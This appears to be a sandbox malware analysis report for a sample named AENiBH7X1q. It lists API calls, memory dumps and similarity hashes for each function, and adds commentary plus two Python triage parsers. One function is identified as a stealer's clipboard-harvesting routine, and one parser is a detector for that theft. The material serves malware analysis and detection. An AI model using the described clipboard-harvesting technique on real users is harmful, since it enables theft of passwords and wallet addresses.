                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fce7466cc8f2b4b34a2e278d60cb4f704f90ff1017bfb666dbfc83d8aba9d67a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d6fd8d7be04635d93ea84c38fc4cb072183cdb5133bdcfdddae5d23db1010fc6
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F028C70204301EFD714DF64DE89F2BB7A8AB84705F104A2DFA45AB2D2D7B4E805CB69
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
• API String ID: 1038674560-3360698832
• Opcode ID: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
• Instruction ID: b6083b7aed1673b33e689ff2aa7e8f17f47d7310e90ec65f4167159f85ee96f3
• Opcode Fuzzy Hash: 87a66eadcaf8420a9e8e1157d1f7c7fd58aef90dc088af7a86e197dee8fb1ec4
• Instruction Fuzzy Hash: 5A611471B4071076EA306A229C46FAB735CDF14345F50052FFC01A628BE7ADDA4A86EE
APIs
• GetSysColor.USER32(0000000E), ref: 00433D81
• SetTextColor.GDI32(?,00000000), ref: 00433D89
• GetSysColor.USER32(00000012), ref: 00433DA3
• SetTextColor.GDI32(?,?), ref: 00433DAB
• GetSysColorBrush.USER32(0000000F), ref: 00433DBF
• GetSysColor.USER32(0000000F), ref: 00433DCB
• CreateSolidBrush.GDI32(?), ref: 00433DD4
• GetSysColor.USER32(00000011), ref: 00433DEB
• CreatePen.GDI32(00000000,00000001,00743C00), ref: 00433DFD
• SelectObject.GDI32(?,00000000), ref: 00433E0D
• SetBkColor.GDI32(?,?), ref: 00433E19
• SelectObject.GDI32(?,?), ref: 00433E29
• InflateRect.USER32(?,000000FF,000000FF), ref: 00433E54
• RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00433E73
• GetWindowLongW.USER32 ref: 00433E8A
• SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00433EAC
• GetWindowTextW.USER32(00000000,00000000,00000105), ref: 00433EE1
• InflateRect.USER32(?,000000FD,000000FD), ref: 00433F13
• DrawFocusRect.USER32(?,?), ref: 00433F1F
• GetSysColor.USER32(00000011), ref: 00433F2E
• SetTextColor.GDI32(?,00000000), ref: 00433F36
• DrawTextW.USER32(?,?,000000FF,?,?), ref: 00433F4E
• SelectObject.GDI32(?,?), ref: 00433F63
• DeleteObject.GDI32(?), ref: 00433F70
• SelectObject.GDI32(?,?), ref: 00433F78
• DeleteObject.GDI32(00000000), ref: 00433F7B
• SetTextColor.GDI32(?,?), ref: 00433F83
• SetBkColor.GDI32(?,?), ref: 00433F8F
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1582027408-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: aa454ab644ffbff4d2185aee23397a25bdbdaef3ad5a75b83a3ebbbeed3afe32
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b51a09b4c85f12ae70b13129e7bad5c5e259c1925df30aaa8741127af755d25
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53710570508340AFD304DF68DD88A6FBBF9FF89711F104A2DFA5592290D7B4E9418B6A
APIs
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Clipboard$CloseGlobal$AvailableDataFormatLock$OpenUnlock
• String ID: HH
• API String ID: 589737431-2761332787
• Opcode ID: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
• Instruction ID: ccec0c76267f611a980a6192e38ed766f4c6ddce8b7f15b38bc446a2cb1d96e7
• Opcode Fuzzy Hash: 1f8588b948bb152d659cc961560e711d284fc80ef968a1445fa6f6d22cce4332
• Instruction Fuzzy Hash: 4D61E5722003019BD310EF65DD86B5E77A8EF54715F00483EFA41E72D1EBB5D9048BAA
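The function above is the clipboard-read pattern a stealer uses: OpenClipboard, IsClipboardFormatAvailable/GetClipboardData for format 0x0D (CF_UNICODETEXT) and then 0x01 (CF_TEXT), GlobalLock on the returned handle to read the bytes, GlobalUnlock and CloseClipboard. The following is an added triage helper, not code from Joe Sandbox or from the sample: it parses an API listing in the layout shown above and reports whether the function actually reads clipboard text (GetClipboardData with a text format followed by GlobalLock on the handle) rather than merely opening the clipboard. The clipboard format constants come from winuser.h; the two listings embedded in the script are constructed test inputs, the first copied from the function above.

```python
import re
from dataclasses import dataclass

# Constructed sample: the API listing of the clipboard function above,
# in the same "• Api.MODULE(args), ref: ADDR" layout the report uses.
SAMPLE_LISTING = """\
• OpenClipboard.USER32(?), ref: 0046C635
• IsClipboardFormatAvailable.USER32(0000000D), ref: 0046C643
• GetClipboardData.USER32(0000000D), ref: 0046C64F
• CloseClipboard.USER32 ref: 0046C65D
• GlobalLock.KERNEL32(00000000), ref: 0046C688
• CloseClipboard.USER32 ref: 0046C692
• IsClipboardFormatAvailable.USER32(00000001), ref: 0046C6D5
• GetClipboardData.USER32(00000001), ref: 0046C6DD
• GlobalLock.KERNEL32(00000000), ref: 0046C6EE
• GlobalUnlock.KERNEL32(00000000), ref: 0046C726
• CloseClipboard.USER32 ref: 0046C866
"""

# Constructed negative sample: opens the clipboard but only probes for
# a file-drop handle (CF_HDROP) and never fetches text.
NEGATIVE_LISTING = """\
• OpenClipboard.USER32(?), ref: 00401000
• IsClipboardFormatAvailable.USER32(0000000F), ref: 00401010
• CloseClipboard.USER32 ref: 00401020
"""

# Standard clipboard format identifiers (winuser.h).
CLIPBOARD_FORMATS = {0x1: "CF_TEXT", 0x7: "CF_OEMTEXT", 0xD: "CF_UNICODETEXT", 0xF: "CF_HDROP"}
TEXT_FORMATS = {0x1, 0x7, 0xD}

# One listing line: optional bullet, Api.MODULE, optional (args), "ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: int  # call-site address inside the function


def parse_listing(text: str) -> list[ApiCall]:
    """Parse the report's API bullet lines; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16)))
    return calls


def arg_int(arg: str):
    """Decode a hex argument; '?' means the sandbox could not resolve the value."""
    return None if arg == "?" else int(arg, 16)


def summarize_clipboard_access(calls: list[ApiCall]) -> dict:
    """Walk the calls in listing order and decide whether clipboard text is read.

    A text read needs GetClipboardData on a text format after OpenClipboard,
    followed by GlobalLock on the handle (the point where the bytes are touched).
    """
    opened = False
    formats_read: list[str] = []
    handle_pending = False
    locks_data = False
    for c in calls:
        if c.api == "OpenClipboard":
            opened = True
        elif c.api == "GetClipboardData" and opened:
            fmt = arg_int(c.args[0]) if c.args else None
            if fmt in TEXT_FORMATS:
                formats_read.append(CLIPBOARD_FORMATS[fmt])
                handle_pending = True
        elif c.api == "GlobalLock" and handle_pending:
            locks_data = True
            handle_pending = False
    if formats_read and locks_data:
        verdict = "clipboard text read"
    elif opened:
        verdict = "clipboard opened, no text read"
    else:
        verdict = "no clipboard access"
    return {"opens_clipboard": opened, "text_formats_read": formats_read,
            "locks_data": locks_data, "verdict": verdict}


if __name__ == "__main__":
    for name, listing in (("sample", SAMPLE_LISTING), ("negative", NEGATIVE_LISTING)):
        print(name, summarize_clipboard_access(parse_listing(listing)))
```

Run it against a listing pasted from a report; the verdict distinguishes a function that harvests clipboard text (both Unicode and ANSI formats here, which is typical for a stealer that wants wallet addresses and passwords regardless of the source application) from GUI code that merely queries the clipboard. Unresolved arguments ("?") are left undecoded rather than guessed.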
APIs
• GetCursorPos.USER32(?), ref: 00456692
• GetDesktopWindow.USER32 ref: 004566AA
• GetWindowRect.USER32(00000000), ref: 004566B1
• GetWindowLongW.USER32(?,000000F0), ref: 0045670D
• GetWindowLongW.USER32(?,000000F0), ref: 00456720
• DestroyWindow.USER32(?), ref: 00456731
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456779
• SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 00456797
• SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567C0
• SendMessageW.USER32(?,00000421,?,?), ref: 004567D8
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004567EE
• IsWindowVisible.USER32(?), ref: 00456812
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 0045682E
• SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 00456843
• GetWindowRect.USER32(?,?), ref: 0045685C
• MonitorFromPoint.USER32(?,?,00000002), ref: 00456880
• GetMonitorInfoW.USER32 ref: 00456894
• CopyRect.USER32(?,?), ref: 004568A8
• SendMessageW.USER32(?,00000412,00000000), ref: 0045690A
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$MessageSend$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ($,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 541082891-3320066284
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3987ef5f26dee50c6234681dd74380f3ee0746d74ffcadc96223edc745891050
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25380f5391d2fe641591a116f81b43842710cc101ecbbf85cfa067c854d9f55a
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 33B18EB0604341AFD714DF64C984B6BB7E5EF88704F408D2DF989A7292D778E848CB5A
APIs
• _wcslen.LIBCMT ref: 00454DCF
• _wcslen.LIBCMT ref: 00454DE2
• __wcsicoll.LIBCMT ref: 00454DEF
• _wcslen.LIBCMT ref: 00454E04
• __wcsicoll.LIBCMT ref: 00454E11
• _wcslen.LIBCMT ref: 00454E24
• __wcsicoll.LIBCMT ref: 00454E31
  • Part of subcall function 004115D0: __wcsicmp_l.LIBCMT ref: 00411657
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00454E65
• LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,?,?,?,?,?,?,?,00000000), ref: 00454E79
• LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454EB7
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00454EFB
• LoadImageW.USER32(00000000,00000000,?,00000001,?,?), ref: 00454F2C
• FreeLibrary.KERNEL32(00000000), ref: 00454F37
• ExtractIconExW.SHELL32(?,00000000,00000000,?,00000001), ref: 00454F94
• DestroyIcon.USER32(?), ref: 00454FA2
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00454FC0
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00454FCC
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00454FF1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Load$Image_wcslen$__wcsicoll$IconLibraryMessageSend$DestroyExtractFreeMoveWindow__wcsicmp_l
• String ID: .dll$.exe$.icl
• API String ID: 2511167534-1154884017
• Opcode ID: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
• Instruction ID: 777b7c61fe84a0ac0f88e3bb9536c5d4e291b97e4b5026f6b39318954af55ba4
• Opcode Fuzzy Hash: 3f138871eb6b7f703bfd118eaab481945a2915db6d26b5ab3e2ea40d00a2935e
• Instruction Fuzzy Hash: D461D9711043016AE620DF659D85F7B73ECEF84B0AF00481EFE81D5182E7B9A989C77A
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00436B4E
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00436B73
• _wcslen.LIBCMT ref: 00436B79
• _wcscpy.LIBCMT ref: 00436B9F
• _wcscat.LIBCMT ref: 00436BC0
• VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00436BE7
• _wcscat.LIBCMT ref: 00436C2A
• _wcscat.LIBCMT ref: 00436C31
• __wcsicoll.LIBCMT ref: 00436C4B
• _wcsncpy.LIBCMT ref: 00436C62
Strings
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1503153545-1459072770
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f4118b49cd66f9fee818cdfc0bae26735a4a754b0a3131160812af9443992caa
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 008cb01cbb675dac6eb9866d49a054c7095339c3b591b4350c6f773ace1c370f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B54115B264020137D200B7269C83EFF735CDE99715F54091FFE45A2253FA2EA69642BE
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
                                                                                                                                                                                                                                                                                                                                                                                                                • _fseek.LIBCMT ref: 004527FC
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 0045285C
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscpy.LIBCMT ref: 00452871
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00452886
                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 004528B0
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004528C8
                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 004528DD
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452914
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452925
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452944
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452955
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452976
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452987
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452998
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 004529A9
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                                                                                                                                                                                                                                                                                                                                                                                                                • __fread_nolock.LIBCMT ref: 00452A39
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2054058615-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 66779ec6e5012556871fefb3c18d5d4f0449fb8b445ab61f685bb60241e2a5ae
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16C14EB2508340ABD320DF65C881EEBB7E8EFC9714F444D2FF68987241E6799544CBA6
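The function records above (API references with call-site addresses, memory dump descriptors and the Similarity identifiers) are what an analyst pivots on when hunting for related samples, so it helps to have them in a structured form rather than as report text. The following parser is an added example written for this page, not Joe Sandbox code; it understands only the plain-text shape the report prints and assumes nothing about field semantics the report does not state. The sample input is a constructed, trimmed copy of two records in this section; the second is deliberately left without a Similarity section to show that missing fields are tolerated.

```python
"""Parse per-function records from a Joe Sandbox 'Executed Functions' listing.
Hypothetical helper for this page (not Joe Sandbox's own code)."""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records trimmed to the shape seen in the report.
SAMPLE = """\
APIs
  • Part of subcall function 004431E0: __time64.LIBCMT ref: 004431EA
• _fseek.LIBCMT ref: 004527FC
• __wsplitpath.LIBCMT ref: 0045285C
• _wcscpy.LIBCMT ref: 00452871
• __fread_nolock.LIBCMT ref: 00452914
• __fread_nolock.LIBCMT ref: 00452925
  • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __fread_nolock$_wcscat_wcscpy$__wsplitpath$__time64_fseek
• String ID:
• API String ID: 2054058615-0
• Opcode Fuzzy Hash: 983239acf030dd5dbcb525efe1f3094d5bf78e470c43ee0c462dc16c64ee25c2
APIs
  • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
• GetWindowRect.USER32(?,?), ref: 004701EA
• GetClientRect.USER32(?,?), ref: 004701FA
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

SECTION_HEADERS = {"Strings", "APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
                    r"(?P<name>[^.\s]+)\.(?P<mod>[A-Za-z0-9_]+)(?:\([^)]*\))?,? ref: (?P<ref>[0-9A-Fa-f]{8})$")
SRC_RE = re.compile(r"^Source File: (?P<file>[^,\s]+), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)$")


@dataclass
class ApiRef:
    name: str
    module: str
    ref: int                    # call-site address printed after 'ref:'
    via_subcall: Optional[int]  # callee address when flagged 'Part of subcall function'


@dataclass
class FunctionRecord:
    apis: List[ApiRef] = field(default_factory=list)
    strings: List[str] = field(default_factory=list)
    source_file: Optional[str] = None
    offset: Optional[int] = None
    based_on_pe: Optional[bool] = None
    associated: List[str] = field(default_factory=list)
    snapshot_file: Optional[str] = None
    similarity: Dict[str, str] = field(default_factory=dict)

    def past_listing(self) -> bool:
        """True once a section after Strings/APIs has been seen for this record."""
        return self.source_file is not None or self.snapshot_file is not None or bool(self.similarity)


def parse_function_records(text: str) -> List[FunctionRecord]:
    records: List[FunctionRecord] = []
    cur: Optional[FunctionRecord] = None
    section: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            # Strings/APIs open a new record unless the current one is still in its listing phase
            if line in ("Strings", "APIs") and (cur is None or cur.past_listing()):
                cur = FunctionRecord()
                records.append(cur)
            section = line
            continue
        if cur is None or not line.startswith("•"):
            continue  # text outside a record, or a non-bullet line
        entry = line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(entry)
            if m:
                cur.apis.append(ApiRef(m["name"], m["mod"], int(m["ref"], 16),
                                       int(m["sub"], 16) if m["sub"] else None))
        elif section == "Strings":
            cur.strings.append(entry)
        elif section == "Memory Dump Source":
            m = SRC_RE.match(entry)
            if m:
                cur.source_file, cur.offset, cur.based_on_pe = m["file"], int(m["off"], 16), m["pe"] == "true"
            elif entry.startswith("Associated:"):
                cur.associated.append(entry.split(":", 1)[1].strip())
        elif section == "Joe Sandbox IDA Plugin" and entry.startswith("Snapshot File:"):
            cur.snapshot_file = entry.split(":", 1)[1].strip()
        elif section == "Similarity":
            key, _, val = entry.partition(":")
            cur.similarity[key.strip()] = val.strip()
    return records


def api_histogram(rec: FunctionRecord) -> Dict[str, int]:
    """Count references as 'MODULE!name', direct and subcall alike."""
    return dict(Counter(f"{a.module}!{a.name}" for a in rec.apis))


def direct_apis(rec: FunctionRecord) -> List[str]:
    """APIs called from the function body itself, in report order."""
    return [a.name for a in rec.apis if a.via_subcall is None]


def group_by_opcode_hash(records: List[FunctionRecord]) -> Dict[str, List[int]]:
    """Record indices per Opcode Fuzzy Hash; shared hashes are pivot candidates across samples."""
    groups: Dict[str, List[int]] = {}
    for i, rec in enumerate(records):
        h = rec.similarity.get("Opcode Fuzzy Hash")
        if h:
            groups.setdefault(h, []).append(i)
    return groups


if __name__ == "__main__":
    for i, rec in enumerate(parse_function_records(SAMPLE)):
        print(i, hex(rec.offset or 0), direct_apis(rec), api_histogram(rec))
```

Run it on the copied text of a report section to get one record per function; the `direct_apis` list separates what the function itself calls from what its callees do, which matters when reading a record like the file-reading one above (`_fseek`, `__wsplitpath`, repeated `__fread_nolock`) without being misled by subcall noise.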
Strings
Memory Dump Source
